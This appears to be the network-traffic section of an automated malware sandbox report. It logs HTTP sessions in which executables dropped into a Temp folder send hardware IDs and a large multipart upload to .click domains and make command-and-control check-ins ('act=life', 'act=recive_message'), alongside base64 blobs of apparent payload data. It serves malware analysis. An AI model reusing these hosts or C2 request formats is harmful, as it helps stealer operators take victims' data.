                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 53 61 58 6b 54 6f 70 55 76 33 31 32 78 2b 71 69 74 2b 54 78 72 78 58 47 75 58 76 46 7a 35 6b 72 72 54 30 62 31 59 70 77 36 6b 52 4a 71 4b 77 47 32 46 79 71 50 69 43 4a 7a 36 53 73 37 2f 76 74 4c 63 43 7a 66 73 6e 61 31 44 44 78 4c 6c 76 61 67 7a 47 34 44 67 54 6e 35 41 66 53 45 2f 39 39 48 35 44 4c 34 35 62 6b 39 65 4d 6e 30 2f 64 71 6a 4d 43 5a 4d 2b 39 6b 41 35 4b 4c 4f 4c 63 42 53 36 69 75 44 73 39 5a 71 7a 55 67 68 4e 4b 75 70 2b 66 33 35 53 72 49 75 58 48 4b 30 4e 49 2f 35 53 52 61 32 4d 5a 2b 38 67 4e 63 36 66 78 41 2f 6c 53 72 4d 43 48 46 39 61 4b 74 36 66 7a 37 59 4e 72 35 62 49 4c 65 31 58 53 37 5a 46 66 62 68 6a 75 34 41 45 53 75 71 51 58 4a 56 4b 51 77 4b 59 33 4f 70 71 66 72 38 75 41 6d 78 62 42 78 78 38 76 63 50 65 38 6f 47 35 7a 47 4e 36 70
                                                                                                                                                                                                                                                              Data Ascii: SaXkTopUv312x+qit+TxrxXGuXvFz5krrT0b1Ypw6kRJqKwG2FyqPiCJz6Ss7/vtLcCzfsna1DDxLlvagzG4DgTn5AfSE/99H5DL45bk9eMn0/dqjMCZM+9kA5KLOLcBS6iuDs9ZqzUghNKup+f35SrIuXHK0NI/5SRa2MZ+8gNc6fxA/lSrMCHF9aKt6fz7YNr5bILe1XS7ZFfbhju4AESuqQXJVKQwKY3Opqfr8uAmxbBxx8vcPe8oG5zGN6p
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC177INData Raw: 41 66 47 45 2f 39 39 4a 34 37 53 72 36 33 75 39 75 73 6f 77 72 6c 34 79 64 2f 53 4d 2b 51 69 56 74 71 4c 4e 62 45 46 51 4b 4f 32 41 38 46 5a 71 6a 64 75 79 59 43 6d 75 36 65 6a 72 51 66 4a 6e 6d 58 5a 79 38 39 30 2f 47 70 43 6b 6f 45 38 38 6c 77 45 71 71 73 4a 78 56 75 76 4d 69 47 44 7a 71 65 6c 36 76 37 69 4b 74 65 2f 65 38 2f 53 31 6a 2f 78 4a 46 62 57 69 6a 53 36 44 30 37 70 36 6b 44 4e 53 2b 64 6c 62 72 4c 4e 72 71 50 6b 37 61 30 2f 69 36 34 31 78 64 57 5a 62 4b 4d 6f 56 64 4b 4a 50 4c 34 50 54 4b 69 6f 44 73 31 57 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: AfGE/99J47Sr63u9usowrl4yd/SM+QiVtqLNbEFQKO2A8FZqjduyYCmu6ejrQfJnmXZy890/GpCkoE88lwEqqsJxVuvMiGDzqel6v7iKte/e8/S1j/xJFbWijS6D07p6kDNS+dlbrLNrqPk7a0/i641xdWZbKMoVdKJPL4PTKioDs1W
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 33 63 63 63 0d 0a 72 6a 55 6d 6c 63 47 6c 71 2b 62 31 34 69 48 42 73 6e 44 47 33 74 30 79 37 47 51 56 6b 6f 45 6f 38 6c 77 45 68 6f 4d 31 69 48 4b 64 66 54 48 4a 32 65 47 6b 36 37 75 31 59 4d 6d 30 65 63 72 57 33 7a 33 76 4c 6c 4c 5a 69 6a 75 32 43 45 32 73 6f 67 48 50 56 71 59 35 49 6f 33 47 6f 71 44 6f 39 4f 49 6f 68 66 6b 31 78 63 47 5a 62 4b 4d 42 54 4e 6d 49 4e 76 49 62 43 72 44 6b 42 38 59 54 2f 33 30 69 6a 73 61 6e 70 75 76 36 36 79 6a 41 76 33 48 44 33 39 38 33 37 43 42 65 30 34 6b 30 76 67 70 4f 71 4b 55 4d 77 56 79 73 4f 47 37 4a 67 4b 61 37 70 36 4f 74 45 63 61 68 59 74 4c 56 6d 53 75 74 50 52 76 56 69 6e 44 71 52 45 57 37 72 67 72 45 56 71 67 34 4c 59 6a 48 72 4b 58 72 38 65 51 6f 77 37 68 38 30 4e 72 56 4f 75 51 71 56 39 79 4c 4f 72 45 4a 42
                                                                                                                                                                                                                                                              Data Ascii: 3cccrjUmlcGlq+b14iHBsnDG3t0y7GQVkoEo8lwEhoM1iHKdfTHJ2eGk67u1YMm0ecrW3z3vLlLZiju2CE2sogHPVqY5Io3GoqDo9OIohfk1xcGZbKMBTNmINvIbCrDkB8YT/30ijsanpuv66yjAv3HD39837CBe04k0vgpOqKUMwVysOG7JgKa7p6OtEcahYtLVmSutPRvVinDqREW7rgrEVqg4LYjHrKXr8eQow7h80NrVOuQqV9yLOrEJB
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 41 56 4b 41 32 4a 6f 7a 50 70 37 48 72 39 66 38 6c 31 36 55 31 6a 4a 6e 65 4c 4b 4e 38 47 2b 53 42 49 4b 49 48 42 70 69 79 41 39 78 59 71 6a 46 75 6d 49 36 34 34 2b 44 33 72 58 69 46 73 58 72 4c 32 74 59 31 36 69 68 57 31 34 38 31 73 77 4a 41 6f 36 34 41 7a 46 57 6d 4f 43 53 45 77 61 75 71 34 50 50 71 49 39 66 33 4f 34 4c 65 77 58 53 37 5a 48 4c 56 6c 44 36 69 52 46 76 6e 76 55 44 4e 58 2b 64 6c 62 6f 50 4b 72 71 66 67 39 2b 73 6c 77 37 70 30 7a 64 6a 5a 4f 2b 63 76 55 74 53 48 50 62 63 4a 51 4c 75 75 43 38 56 66 72 6a 45 6a 78 34 37 68 70 50 2b 37 74 57 44 30 75 6e 76 4d 33 73 39 30 2f 47 70 43 6b 6f 45 38 38 6c 77 45 71 4b 67 50 79 56 79 6b 50 69 2b 4e 30 72 4f 76 37 76 50 6f 4c 4d 36 35 63 39 44 66 31 6a 33 67 4a 31 4c 56 6a 6a 79 34 42 30 50 70 36 6b
                                                                                                                                                                                                                                                              Data Ascii: AVKA2JozPp7Hr9f8l16U1jJneLKN8G+SBIKIHBpiyA9xYqjFumI644+D3rXiFsXrL2tY16ihW1481swJAo64AzFWmOCSEwauq4PPqI9f3O4LewXS7ZHLVlD6iRFvnvUDNX+dlboPKrqfg9+slw7p0zdjZO+cvUtSHPbcJQLuuC8VfrjEjx47hpP+7tWD0unvM3s90/GpCkoE88lwEqKgPyVykPi+N0rOv7vPoLM65c9Df1j3gJ1LVjjy4B0Pp6k
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 4b 69 6d 59 6a 72 6a 6a 34 50 65 74 65 49 57 78 66 4d 54 65 33 7a 72 78 49 56 33 64 69 54 6d 37 41 45 79 71 70 41 54 4f 56 4b 49 2b 49 6f 7a 48 6f 71 7a 6a 38 75 4d 70 79 76 63 37 67 74 37 42 64 4c 74 6b 65 73 6d 46 50 4c 39 45 57 2b 65 39 51 4d 31 66 35 32 56 75 69 38 36 6b 6f 2b 33 39 36 53 58 44 76 58 44 43 30 74 6f 37 35 79 4a 66 33 59 59 37 75 77 56 43 72 4b 34 4c 7a 46 36 6b 4f 79 6a 48 6a 75 47 6b 2f 37 75 31 59 4f 57 73 65 4d 37 65 6d 53 75 74 50 52 76 56 69 6e 44 71 52 45 2b 6c 6f 41 66 4b 58 71 51 31 4b 34 50 4b 70 4b 50 76 36 65 55 67 77 71 56 6e 77 74 44 63 4f 4f 41 6b 58 39 53 50 4e 72 45 41 42 4f 66 6b 42 39 49 54 2f 33 30 44 69 38 65 49 70 50 79 37 38 6d 37 63 39 33 4c 4f 6d 59 46 30 34 69 39 52 33 59 73 7a 74 41 64 50 72 4b 34 42 7a 56 75
                                                                                                                                                                                                                                                              Data Ascii: KimYjrjj4PeteIWxfMTe3zrxIV3diTm7AEyqpATOVKI+IozHoqzj8uMpyvc7gt7BdLtkesmFPL9EW+e9QM1f52Vui86ko+396SXDvXDC0to75yJf3YY7uwVCrK4LzF6kOyjHjuGk/7u1YOWseM7emSutPRvVinDqRE+loAfKXqQ1K4PKpKPv6eUgwqVnwtDcOOAkX9SPNrEABOfkB9IT/30Di8eIpPy78m7c93LOmYF04i9R3YsztAdPrK4BzVu
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 35 4c 76 34 2f 57 37 74 57 43 43 74 47 66 51 33 39 6f 69 34 47 4e 6c 37 4b 45 6d 75 41 4e 55 72 72 4d 50 69 68 33 6e 4d 6d 37 66 2b 65 47 71 34 4f 44 38 4e 73 69 6e 63 6f 4c 6d 6c 33 54 37 5a 41 4f 53 73 7a 4f 38 43 6b 4f 2f 74 55 33 74 52 61 30 36 50 6f 44 58 72 75 4f 70 75 2b 74 67 6e 65 51 37 67 74 33 49 64 4c 74 30 43 59 6e 54 59 2b 56 55 46 72 62 71 47 59 70 46 35 32 56 38 79 59 43 7a 34 37 2b 37 71 69 50 58 70 58 50 42 7a 39 70 7a 33 52 70 38 79 49 73 32 70 52 56 36 6c 36 4d 61 78 31 57 77 4c 47 4b 53 77 36 2b 74 34 4f 32 74 62 6f 57 34 4e 5a 72 67 6d 58 79 6a 47 78 57 53 6e 6e 44 71 52 48 47 71 71 67 37 4e 52 62 5a 77 43 5a 33 4e 70 37 54 32 75 36 4e 67 77 2f 63 74 6b 70 65 5a 4d 50 4a 6b 41 34 4c 55 61 2b 64 58 45 2f 6e 32 48 34 52 4b 35 79 74 75
                                                                                                                                                                                                                                                              Data Ascii: 5Lv4/W7tWCCtGfQ39oi4GNl7KEmuANUrrMPih3nMm7f+eGq4OD8NsincoLml3T7ZAOSszO8CkO/tU3tRa06PoDXruOpu+tgneQ7gt3IdLt0CYnTY+VUFrbqGYpF52V8yYCz47+7qiPXpXPBz9pz3Rp8yIs2pRV6l6Max1WwLGKSw6+t4O2tboW4NZrgmXyjGxWSnnDqRHGqqg7NRbZwCZ3Np7T2u6Ngw/ctkpeZMPJkA4LUa+dXE/n2H4RK5ytu
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 58 32 75 36 4e 67 79 76 63 74 2b 35 6d 52 64 4e 78 71 47 38 72 47 61 50 49 78 52 36 65 71 42 39 78 43 36 68 6f 67 67 4d 47 33 73 2f 44 30 72 57 36 46 73 54 57 61 69 35 64 30 35 7a 55 62 69 74 5a 69 36 56 45 58 2f 76 52 53 31 52 32 2b 66 54 6a 48 6d 50 50 74 70 2b 6d 74 65 49 58 77 64 74 44 4c 33 7a 66 31 4a 78 7a 73 75 42 65 38 41 30 57 2f 74 42 66 46 48 49 6b 4c 44 37 6e 2b 74 4b 44 70 39 65 6f 32 31 50 63 37 67 74 61 5a 62 4e 70 6b 45 35 4b 35 66 76 49 63 42 50 48 6b 4e 63 6c 64 71 54 6f 34 6c 6f 32 47 72 65 44 36 2b 7a 44 53 75 44 72 73 37 2f 68 30 72 57 52 64 6b 74 35 69 2f 45 52 41 75 4f 52 59 6d 67 48 38 61 48 33 51 6b 50 4f 38 71 65 4b 74 4e 6f 58 76 4a 34 79 5a 79 33 53 37 5a 42 7a 52 6c 43 4b 30 42 31 4b 71 34 7a 37 30 64 4b 6b 36 4c 35 48 51 72
                                                                                                                                                                                                                                                              Data Ascii: X2u6Ngyvct+5mRdNxqG8rGaPIxR6eqB9xC6hoggMG3s/D0rW6FsTWai5d05zUbitZi6VEX/vRS1R2+fTjHmPPtp+mteIXwdtDL3zf1JxzsuBe8A0W/tBfFHIkLD7n+tKDp9eo21Pc7gtaZbNpkE5K5fvIcBPHkNcldqTo4lo2GreD6+zDSuDrs7/h0rWRdkt5i/ERAuORYmgH8aH3QkPO8qeKtNoXvJ4yZy3S7ZBzRlCK0B1Kq4z70dKk6L5HQr


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.449822172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:35 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=4U8D67529
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18108
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:35 UTC15331OUTData Raw: 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 34 55 38 44 36 37 35 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                                              Data Ascii: --4U8D67529Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--4U8D67529Content-Disposition: form-data; name="pid"2--4U8D67529Content-Disposition: form-data; name="lid"FATE99--test--4U8D67529Content-Dispo
                                                                                                                                                                                                                                                              2024-12-22 01:16:35 UTC2777OUTData Raw: 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b
                                                                                                                                                                                                                                                              Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ob2f8n3m8gq5lq0rbf1squ30dh; expires=Wed, 16 Apr 2025 19:03:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KmgQELQzNbVFSe4LGNIrCIcOCmYbGGD%2FYAasTfNkRHS8f%2BcVD%2Fe97ghsw9uq3qP63fo094tm0N8l2CnlhsJiAM2oPByRhMeja8Yde4lgF1OWjps2i0uLgc2KRynCNzNwtbuG5Te"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44719e3832dc-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1798&rtt_var=689&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19064&delivery_rate=1569892&cwnd=241&unsent_bytes=0&cid=e7789fe0d7f0f50a&ts=1155&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.449823104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:35 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:35 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC566INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlDZeF9DSsj%2Fah99ZkjP8hZIUWe5uI49e4RkUM5kg%2BD2%2Fhbyj2xSFtBXOyVLqtRH%2BlxjFeJe91Urc6S0cUS%2Fis30X9e8l1t6U%2FzeUl4z9RJDyZJ4CnR6TpNjJB%2FizkzD7gTGMX0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4474fce34328-EWR
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC803INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                                              Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC1369INData Raw: 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c
                                                                                                                                                                                                                                                              Data Ascii: cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getEl
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC1369INData Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66
                                                                                                                                                                                                                                                              Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <f
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC1015INData Raw: 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70
                                                                                                                                                                                                                                                              Data Ascii: al" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><sp
                                                                                                                                                                                                                                                              2024-12-22 01:16:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.449831104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:37 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 50
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:37 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--geopoxid&j=
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:38 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ttd9r5qsrbh3gi7qnm2oucs154; expires=Wed, 16 Apr 2025 19:03:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DY3Ns9912RiQOxsvPLZX3cQ9RIz5Q9SdjEKeWawoW%2FszGe5qGPQTLxnU0mAtgX2C2MJDOa7eit14mw%2Bx7Q3L2YkKdBdMuQP1Eh2cB0fPBlv%2F3TWGV%2FWipVRLr413nF%2FOHnZEHS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c447f8c72c332-EWR
